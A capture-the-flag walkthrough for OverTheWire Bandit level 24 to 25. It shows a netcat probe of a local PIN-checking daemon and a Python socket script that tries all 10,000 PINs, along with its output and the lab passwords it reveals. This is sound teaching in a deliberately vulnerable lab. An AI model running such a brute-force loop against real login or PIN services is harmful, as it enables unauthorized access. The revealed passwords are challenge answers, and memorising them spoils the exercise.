OverTheWire - Bandit: Level 25 to Level 26
Now, something new comes in game: bruteforcing.
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time
First, let’s check out how the interaction with port 30002
will work. Therefore, we connect to this port and try it out.
1 $ nc localhost 30002
2 I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
3 $ VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 1234
4 Wrong! Please enter the correct pincode. Try again.
5 $ VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9999
6 Wrong! Please enter the correct pincode. Try again.
Since python3
is installed and usable, we can create a small python script to connect to the port and bruteforce the pin.
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as con:
con.connect(('127.0.0.1', 30002))
# let's receive the welcome message
msg = con.recv(255).decode()
for pin in range(0, 10000):
# For some Monitoring we print a message every 500 pins
if pin % 500 == 0:
print(f"reached pin {pin:04d}")
# Preparing our bruteforce string
# The pin, simply an integer, is prepended with zeros
# to match the expected format of a 4-digit pin
to_send = f"VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar {pin:04d}\n"
con.sendall(to_send.encode())
# About 250 bytes should be enough to receive at once.
msg = con.recv(250).decode()
# Since we do not know yet how the message looks like
# in case of success, we simply check for the
# non successful message. If it is not received
# we expect to be successful.
if not "Wrong!" in msg:
print(to_send)
print("leads to:")
print(msg)
break
Again, we create a temporary file under /tmp/
to store the script and then execute it. This takes some time, so one can grep some coffee and cake.
1 $ python3 /tmp/shoujin24.py
2 reached pin 0000
3 reached pin 0500
4 reached pin 1000
5 reached pin 1500
6 reached pin 2000
7 reached pin 2500
8 reached pin 3000
9 reached pin 3500
10 reached pin 4000
11 reached pin 4500
12 reached pin 5000
13 reached pin 5500
14 reached pin 6000
15 reached pin 6500
16 reached pin 7000
17 reached pin 7500
18 reached pin 8000
19 reached pin 8500
20 reached pin 9000
21 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9015
22
23 leads to:
24 Correct!
25 The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
26
27 Exiting.
There it is! The pin is 9015
and the password of bandit25
is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
.